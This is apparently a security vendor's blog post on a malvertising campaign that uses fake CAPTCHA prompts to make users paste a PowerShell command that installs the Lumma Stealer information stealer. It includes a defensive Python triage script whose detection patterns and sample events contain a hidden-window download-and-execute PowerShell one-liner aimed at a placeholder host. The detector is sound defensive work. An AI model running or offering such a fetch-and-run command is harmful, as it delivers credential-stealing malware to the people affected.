An ongoing malvertising campaign is proving effective at distributing a dangerous information-stealing malware called Lumma Stealer, using fake CAPTCHA prompts that appear while users browse the web.

Lumma Stealer is offered under the malware-as-a-service model, where cybercriminals pay to use the malware rather than having to develop their own. The malware has extensive stealing capabilities and will obtain browsing histories, passwords, and cryptocurrency wallet details. That information is then sent to the attacker’s command and control server, where it is either abused directly or sold on. The fake CAPTCHA pages generated in this malvertising campaign will be familiar to web users, as CAPTCHAs are present on many websites; even Google uses them to verify that a user is a human rather than a bot. In this case, the fake CAPTCHA uses images rather than text, and the user must click the images that match the prompt. The user is told to click on images of legitimate advertisements, and after selecting the advertisements and clicking verify, they are tricked into executing a PowerShell command that delivers Lumma Stealer from a remote server.

A variety of popup ads are used in this campaign to appeal to a broad audience, including streaming services, software sites, and fake offers, all designed to attract a click. Code embedded in the ad will perform a check to determine if the user is a person, and if that check is passed, the fake CAPTCHA is displayed. The CAPTCHA page includes JavaScript that silently copies a one-line PowerShell command to the clipboard.

As part of the verification check, the user is presented with a Verification Steps pop-up that instructs them to press the Windows key + R, then press CTRL + V, and then press Enter. Anyone with a reasonable knowledge of computers will be aware that the first step launches the Windows Run dialog box, which is used to quickly run programs. CTRL + V is the keyboard shortcut for pasting, and Enter runs the pasted command. Since the page's JavaScript has already placed the PowerShell command on the clipboard, following those steps runs the PowerShell command, which downloads and executes Lumma Stealer.
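To show what the execution chain described above looks like from the defender's side, here is an added example (written for this post, not code from the campaign analysis or from TitanHQ) that triages constructed Sysmon-style process-creation records: it flags PowerShell started from explorer.exe, which is the parent the Run dialog produces, when the command line carries hidden-window, download or in-memory-execution indicators. The field names, the sample records and the placeholder host are assumptions; the real command used by the campaign is not reproduced here.

```python
import ntpath
import re
from typing import Optional

# Generic traits of a PowerShell one-liner built to be pasted into Win+R:
# hidden window, a web fetch, in-memory execution, or an encoded command.
# These are textbook patterns, not the specific command from the campaign.
CRADLE_PATTERNS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "web_download": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|https?://)", re.I),
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

# Constructed sample events (assumed Sysmon Event ID 1 field names).
SAMPLE_EVENTS = [
    {"User": "LAB\\alice", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr \'http://placeholder.invalid/a\')"'},
    {"User": "LAB\\alice", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},  # user simply opened a shell: benign
    {"User": "LAB\\svc", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ep bypass -File C:\scripts\backup.ps1"},  # scheduled job
    {"User": "LAB\\bob", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},  # constructed blob
]


def triage_event(event: dict) -> Optional[dict]:
    """Return a finding if the event matches the Run dialog -> PowerShell chain."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    # The Run dialog is hosted by explorer.exe, so that is the parent to look for.
    if parent != "explorer.exe" or child not in ("powershell.exe", "pwsh.exe"):
        return None
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in CRADLE_PATTERNS.items() if rx.search(cmd)]
    if not hits:
        return None  # interactive PowerShell with a plain command line
    return {"user": event.get("User", "?"), "command": cmd, "indicators": hits}


def triage(events) -> list:
    """Run triage_event over a batch and keep only the findings."""
    return [f for f in map(triage_event, events) if f]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["user"], finding["indicators"], finding["command"])
```

In production the same check would read real process-creation telemetry; the parent-process condition is what separates a pasted Run-dialog command from PowerShell launched by scripts or scheduled tasks.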

Malvertising campaigns involve adding malicious adverts to third-party ad networks, which are used by a huge number of legitimate websites for generating additional revenue. Advertisers pay to have their adverts displayed on any website that has the ad network’s code. Many high-traffic legitimate sites, such as media sites, use these adverts, so the advertisers can reach a huge number of people. This campaign, which was analyzed by Guardio Labs and Infoblox, was linked to a single ad network, Monetag. The advantage of that ad network to the threat actor is that it allows pop-ups to be displayed, and code can be incorporated to display those pop-ups even if the user has an ad blocker. All ad networks have moderation processes to verify that the ads being displayed are legitimate and not malicious; however, the threat actor has cleverly managed to circumvent those processes, ensuring their ads get millions of impressions.

Anyone browsing the web will have seen adverts displayed through ad networks, and avoiding these ads online is virtually impossible. As this campaign shows, even ad blockers are not always effective. To combat malvertising, businesses should ensure that they cover this tactic in their security awareness training content. Employees should be made aware of the threat and told never to click on ads or popups, and never to execute commands when prompted to do so by a website or an ad.

Creating new training content is easy with the SafeTitan security awareness training platform from TitanHQ. The platform has a huge number of training modules, allowing businesses to easily create custom training programs for different roles, based on the types of threats they are likely to encounter, including malvertising threats.

A web filter is also strongly recommended for blocking access to malicious websites and controlling the sites that users can access, in particular sites offering pirated software, as the ad networks used by these sites tend to have fewer controls on the advertisers that can use them, increasing the chance of malicious adverts being displayed.